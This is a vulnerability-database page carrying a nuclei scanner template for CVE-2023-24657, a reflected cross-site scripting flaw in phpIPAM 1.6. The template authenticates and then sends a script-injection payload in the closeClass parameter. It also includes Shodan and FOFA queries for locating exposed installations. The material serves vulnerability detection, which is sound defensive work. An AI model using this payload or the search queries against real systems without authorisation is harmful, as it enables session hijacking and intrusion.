Lucene search
K

phpIPAM - 1.6 - Cross-Site Scripting

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 123 Views

phpIPAM 1.6 contains a cross-site scripting vulnerability via closeClass parameter at /subnet-masks/popup.php, allowing attacker to steal authentication credentials and launch attacks. Upgrade to patched version or apply security patches

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-24657
8 Mar 202312:23
circl
CNNVD
phpIPAM 跨站脚本漏洞
8 Mar 202300:00
cnnvd
CVE
CVE-2023-24657
8 Mar 202300:00
cve
Cvelist
CVE-2023-24657
8 Mar 202300:00
cvelist
Exploit DB
phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
11 Apr 202500:00
exploitdb
EUVD
EUVD-2023-28668
3 Oct 202520:07
euvd
NVD
CVE-2023-24657
8 Mar 202306:15
nvd
OpenVAS
phpIPAM < 1.5.2 XSS Vulnerability
9 Mar 202300:00
openvas
Packet Storm
📄 phpIPAM 1.6 Cross Site Scripting
11 Apr 202500:00
packetstorm
Prion
Cross site scripting
8 Mar 202306:15
prion
Rows per page
id: CVE-2023-24657

info:
  name: phpIPAM - 1.6 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of phpIPAM or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/phpipam/phpipam/issues/3738
    - https://nvd.nist.gov/vuln/detail/CVE-2023-24657
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-24657
    cwe-id: CWE-79
    epss-score: 0.03904
    epss-percentile: 0.88998
    cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpipam
    product: phpipam
    shodan-query:
      - html:"phpIPAM IP address management"
      - http.html:"phpipam ip address management"
    fofa-query: body="phpipam ip address management"
  tags: cve2023,cve,xss,phpipam,authenticated,vuln

http:
  - raw:
      - |
        POST /app/login/login_check.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ipamusername={{username}}&ipampassword={{password}}
      - |
        GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "Subnet masks")'
        condition: and
# digest: 4a0a004730450220519655a2d165225e0188a5c7b47c78ca93d1d6c2174d87daf4b7fccebff19ccf0221009cb9fd18a97a031ede0acd3f9c400ed8f1542eb54a46a5a8eaa01183b8af6b9c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation